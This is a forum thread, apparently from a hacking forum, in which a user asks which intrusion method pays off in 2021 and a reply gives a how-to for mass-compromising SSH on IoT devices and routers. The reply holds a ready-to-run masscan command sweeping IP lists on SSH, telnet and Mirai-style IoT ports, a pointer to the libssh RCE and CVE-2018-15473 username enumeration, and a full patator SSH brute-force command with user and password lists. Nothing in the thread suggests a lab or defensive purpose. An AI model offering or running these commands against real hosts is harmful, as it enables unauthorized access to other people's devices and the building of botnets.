Cracking SSH
by ksecurity - September 15, 2021 at 03:45 PM
#1
Sad 
Is Cracking SSH make sense in 2021 ? 

What will community vote for. Which kind of scanning method is recommended these days.

1. Cracking SSH
2. Exploiting RCE bugs
3. Scanning for IOT Devices.
4. OSIT
Reply
#2
Cracking ssh make sense if you crack ssh of IOT devices, routers. Servers with their admins is a hard target.
If u are on Linux, I think u should use of course masscan/zmap, but masscan is better and i will tell u about masscan. Masscan by default scan ips and ports, check if port open or not, it dont check is on port ssh service. U can add option: --banners, then Masscan will grab banners of services on open ports.
For example:
sudo masscan -iL fileWithIps --open -p 1900-2300,22,2323,3232,1234,12345 --banners --rate=5000 -oL YourOutputFile
-iL - file with ips.
--open - check for only open(not filtered) ports
-p - ports
--rate - qty of kpp
-oL - output file
After masscan have done his work, u will have in output file open ports and banners. If u need to see all ports with ssh:
cat YourOutputFile | grep ssh
What about exploits? Libssh is very nice for rce. However more popular openssh is more protected, then libssh. I usually use CVE 2018-15473 (Username enumeration, not rce).
If u are looking for IOT devices, u need to set scanning ports to 23,2323,32,3232,22 (as bots of botnet mirai) and other ports, that IOT usually use.
Bruteforce. I think the best bruteforcer is patator. For example:
python3 patator.py ssh_login host=COMBO00 port=COMBO01 user=FILE1 password=FILE2 0=hosts_ports.txt 1=users.txt 2=pass.txt -l outDir --threads 32 -x skip=0:fgrep='No route to host' -x skip=0:fgrep='Bad authentication type'' -x igore:code=1
(openSSH usually send 'Bad authentication type', if u need a publickey; 'No route to host', if host is down)
Reply

 Users browsing this thread: 1 Guest(s)